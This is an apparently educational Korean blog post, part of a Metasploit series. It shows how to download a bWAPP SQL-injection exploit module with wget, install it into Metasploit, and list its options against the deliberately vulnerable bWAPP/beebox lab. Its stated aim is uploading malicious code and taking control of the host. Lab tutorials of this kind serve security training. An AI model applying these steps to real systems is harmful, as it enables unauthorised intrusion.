정보보안(구버전)/Metasploit 2019. 1. 30. 21:01
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
[실습 시스템] Kali Linux, Gateway, bWAPP
- bWAPP : 웹 모의해킹을 할 수 있는 공격 타켓 시스템
[실습 단계]
스캔 -> bwapp 메타스플로잇 모듈 다운로드 -> bwapp SQL 인젝션 > 악성 코드 업로드 실시 -> beebox 제어권 획득
Ex1) 'bwapp-sqli.rb' 다운로드
@bwapp-sqli.rb 다운로드.txt
root@kali:~# wget https://raw.githubusercontent.com/naiduv/codecrawl/master/code/bwapp-sqli.rb
root@kali:~# ls
Desktop Downloads Pictures Ransomware Videos
Documents Music Public Templates bwapp-sqli.rb
root@kali:~# cp bwapp-sqli.rb /usr/share/metasploit-framework/modules/exploits/multi/http/bwapp-sqli.rb
Ex2) msfconsol 실행
root@kali:~# msfconsole -q
msf >msf > search bwapp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/bwapp-sqli excellent bWAPP Sql Injection
msf > use exploit/multi/http/bwapp-sqli
msf exploit(multi/http/bwapp-sqli) >
msf exploit(multi/http/bwapp-sqli) > show options
Module options (exploit/multi/http/bwapp-sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD bug no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /bWAPP/ yes Base bWAPP directory path
USERNAME bee yes Username to authenticate with
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
Metasploit - 제1장 메타스플로잇 (metaspliot)
'정보보안(구버전) > Metasploit' 카테고리의 다른 글
| Metasploit - 20. Metasploit GUI 버전 (Armitage) (2) | 2016.06.08 |
|---|---|
| Metasploit - 19. BeEF & MSF (Fake Web 사이트 구성) (0) | 2016.06.08 |
| Metasploit - 18. BeEF & MSF (Web 브라우저 해킹) (0) | 2016.06.08 |
| Metasploit - 17. BeEF (Web 브라우저 해킹) (0) | 2016.06.08 |
| Metasploit - 16. Setoolkit (스팸 메일-링크 악성 코드) (0) | 2016.06.08 |
